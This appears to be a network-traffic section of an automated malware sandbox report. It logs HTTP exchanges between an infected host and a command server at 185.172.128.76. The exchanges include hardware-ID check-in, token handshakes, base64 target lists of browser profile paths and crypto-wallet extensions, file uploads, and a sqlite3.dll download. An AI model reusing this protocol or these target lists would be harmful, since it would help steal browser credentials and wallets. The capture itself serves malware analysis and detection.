                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFI
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 216
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 32 33 32 42 41 32 36 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="hwid"6A5232BA26AD2322695909------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="build"default10------BFHDAEHDAKECGCAKFCFI--
                                                                                                                                                                                                                            Apr 26, 2024 23:08:58.134627104 CEST347INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:08:58 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 152
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Data Raw: 4d 44 49 7a 4e 57 59 77 4e 57 4a 6d 5a 47 52 6c 4f 47 5a 68 4d 32 5a 68 4d 32 56 6c 5a 6a 42 6b 5a 6a 68 6a 59 54 6b 30 4e 6a 64 69 5a 6d 46 6c 4d 7a 45 32 4d 57 49 30 5a 57 46 6b 4d 7a 4a 6a 4d 54 49 30 5a 6a 64 6a 4d 6a 59 33 4e 47 59 79 4e 6d 55 31 5a 54 59 7a 4f 54 51 79 5a 57 4e 69 66 47 68 6c 63 6a 64 6f 4e 44 68 79 66 47 56 79 4e 47 67 30 5a 54 68 79 4e 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d
                                                                                                                                                                                                                            Data Ascii: MDIzNWYwNWJmZGRlOGZhM2ZhM2VlZjBkZjhjYTk0NjdiZmFlMzE2MWI0ZWFkMzJjMTI0ZjdjMjY3NGYyNmU1ZTYzOTQyZWNifGhlcjdoNDhyfGVyNGg0ZThyNC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
                                                                                                                                                                                                                            Apr 26, 2024 23:08:59.654524088 CEST469OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAK
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 268
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="message"browsers------HJDBFBKKJDHJKECBGDAK--
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.002825975 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:08:59 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 1520
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxV [TRUNCATED]
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.002840996 CEST427INData Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39
                                                                                                                                                                                                                            Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.005433083 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 267
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="message"plugins------FCAFIJJJKEGIECAKKEHI--
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.358799934 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:00 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 5416
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdh [TRUNCATED]
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.358814001 CEST1289INData Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64
                                                                                                                                                                                                                            Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.358875990 CEST1289INData Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c
                                                                                                                                                                                                                            Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.358894110 CEST1289INData Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62
                                                                                                                                                                                                                            Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.358906984 CEST456INData Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57
                                                                                                                                                                                                                            Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.402364969 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAF
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 6183
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.402429104 CEST6183OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30
                                                                                                                                                                                                                            Data Ascii: ------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                            Apr 26, 2024 23:09:00.776063919 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:00 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:01.232124090 CEST93OUTGET /15f649199f40275b/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:01.595376015 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:01 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 1106998
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                            ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
                                                                                                                                                                                                                            Apr 26, 2024 23:09:01.595391035 CEST1289INData Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00
                                                                                                                                                                                                                            Data Ascii: @B/81s:<R@B/92P @B
                                                                                                                                                                                                                            Apr 26, 2024 23:09:01.595648050 CEST1289INData Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89
                                                                                                                                                                                                                            Data Ascii: +C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q|$D$4$*|$D$4$s|$D$4$
                                                                                                                                                                                                                            Apr 26, 2024 23:09:01.595660925 CEST1289INData Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a
                                                                                                                                                                                                                            Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
                                                                                                                                                                                                                            Apr 26, 2024 23:09:01.595671892 CEST1289INData Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75
                                                                                                                                                                                                                            Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.546118021 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECA
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 4599
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:04.921005964 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:04 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:05.557959080 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1451
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:05.939774990 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:05 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:06.150240898 CEST560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 359
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
